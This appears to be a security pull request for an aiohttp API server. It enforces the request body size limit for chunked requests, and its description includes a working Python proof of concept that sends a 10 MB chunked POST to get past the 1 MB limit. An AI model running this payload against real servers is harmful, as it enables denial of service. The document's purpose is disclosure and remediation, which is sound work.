### PR TITLE
fix(security): enforce body size limit for chunked requests in API server

### DIFF
--- a/gateway/platforms/api_server.py
+++ b/gateway/platforms/api_server.py
@@ -1256,7 +1256,7 @@ class APIServerAdapter(BasePlatformAdapter):
 
         try:
             mws = [mw for mw in (cors_middleware, body_limit_middleware, security_headers_middleware) if mw is not None]
-            self._app = web.Application(middlewares=mws)
+            self._app = web.Application(middlewares=mws, client_max_size=MAX_REQUEST_BYTES)
             self._app["api_server_adapter"] = self
             self._app.router.add_get("/health", self._handle_health)
             self._app.router.add_get("/v1/health", self._handle_health)


### PR DESCRIPTION
## Proof of Concept
```bash
# Bypass the 1MB limit using chunked encoding (no Content-Length header)
python3 -c "
import socket
s = socket.create_connection(('localhost', 5000))
body = b'X' * 10_000_000  # 10 MB
chunk = b'%x\r\n%b\r\n0\r\n\r\n' % (len(body), body)
req = (
    b'POST /v1/chat/completions HTTP/1.1\r\n'
    b'Host: localhost\r\n'
    b'Transfer-Encoding: chunked\r\n'
    b'Content-Type: application/json\r\n\r\n'
) + chunk
s.sendall(req)
print(s.recv(256))
"
```

**Before fix:** server reads the full 10 MB body unbounded.
**After fix:** aiohttp returns `413 Request Entity Too Large` immediately.

Note: especially impactful when the server is bound to `0.0.0.0` with no
`API_SERVER_KEY` — docs warn this exposes full terminal access to anyone
on the network. An unauthenticated DoS in that configuration is critical.